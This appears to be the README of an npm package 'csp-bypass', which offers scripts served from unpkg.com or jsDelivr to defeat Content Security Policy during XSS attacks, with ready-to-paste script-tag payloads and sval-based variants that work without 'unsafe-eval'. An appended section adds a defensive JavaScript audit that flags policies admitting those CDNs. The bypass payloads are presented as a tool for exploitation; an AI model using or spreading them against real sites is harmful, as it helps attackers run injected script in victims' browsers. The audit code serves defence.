csp-bypass
Need any help bypassing CSP ?
Keywords
CSP, bypass, XSS, injection, canardcanardmandarin
easy-csp-bypass
Just a fun project to see if this code can end up in some CDN, so it would be easier to exploit XSS with CSP.
How to use ?
Well, it depends. If you are lucky enough to find unsafe-eval in the CSP configuration, you can use one of these scenarios:
- Classic => /dist/classic.js
- Classic-infinite => /dist/classic-infinite.js
- Url => /dist/url.js
If you can't use eval() because unsafe-eval is not in the configuration, well, it's not over !! I found a JavaScript interpreter called sval. It can easily bypass the unsafe-eval restriction :) !
- Classic => /dist/sval-classic.js
- Classic-infinite => /dist/sval-infinite.js
- Url => /dist/sval-url.js
Example
If you have an XSS on a website with CSP, look in the 'script-src' directive for unpkg.com or jsDelivr. If these domains are whitelisted, you win !
<script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
<br csp="alert(1)">
If 'unsafe-eval' is missing, use the sval one:
<script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/sval-classic.js"></script>
<br csp="alert(1)">
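For the defending side, an added example (not part of the csp-bypass package): a policy audit that flags script sources admitting unpkg.com or jsDelivr, whether or not 'unsafe-eval' is present, since the sval builds above do not need it. The function names, the host list (cdn.jsdelivr.net is assumed as jsDelivr's host) and the sample policy are constructed for illustration.

```javascript
// Added example: audit a CSP for the condition this README relies on.
// RISKY_HOSTS is an assumption for illustration: CDNs that serve any published npm package.
const RISKY_HOSTS = ["unpkg.com", "cdn.jsdelivr.net"];

// Parse a policy string into a Map of directive name -> source expressions.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    // A repeated directive is ignored by browsers; the first occurrence wins.
    if (name && !directives.has(name.toLowerCase())) directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Does one source expression (host, wildcard host, or bare scheme) admit `host` over HTTPS?
function sourceCoversHost(source, host) {
  const s = source.toLowerCase();
  if (s === "*" || s === "https:" || s === "http:") return true;
  if (s.startsWith("'")) return false; // keywords, nonces, hashes
  const m = /^(?:https?:\/\/)?([^/:]+)(?::[\d*]+)?(?:\/.*)?$/.exec(s);
  if (!m) return false; // data:, blob: and other non-host sources
  if (m[1] === "*") return true;
  if (m[1].startsWith("*.")) return host.endsWith(m[1].slice(1)); // *.x.com excludes x.com
  return m[1] === host;
}

function auditScriptSources(policy) {
  const directives = parseCsp(policy);
  // No script-src and no default-src means scripts (and eval) are unrestricted.
  const scriptSrc = directives.get("script-src") ?? directives.get("default-src") ?? ["*", "'unsafe-eval'"];
  // <script src> is governed by script-src-elem when present, else by script-src.
  const elemSrc = directives.get("script-src-elem") ?? scriptSrc;
  const findings = [];
  for (const source of elemSrc) {
    for (const host of RISKY_HOSTS) {
      if (sourceCoversHost(source, host)) findings.push({ source, host });
    }
  }
  // unsafeEval is informational: the sval builds described above interpret
  // JavaScript themselves, so its absence does not clear a finding.
  const unsafeEval = scriptSrc.some((s) => s.toLowerCase() === "'unsafe-eval'");
  return { findings, unsafeEval };
}

// Constructed sample policy, not taken from any real site.
const sample = "default-src 'self'; script-src 'self' https://unpkg.com https://*.jsdelivr.net";
console.log(auditScriptSources(sample));
```

Where the policy also carries 'strict-dynamic', supporting browsers ignore host sources, so a finding there matters mainly for browsers without that support.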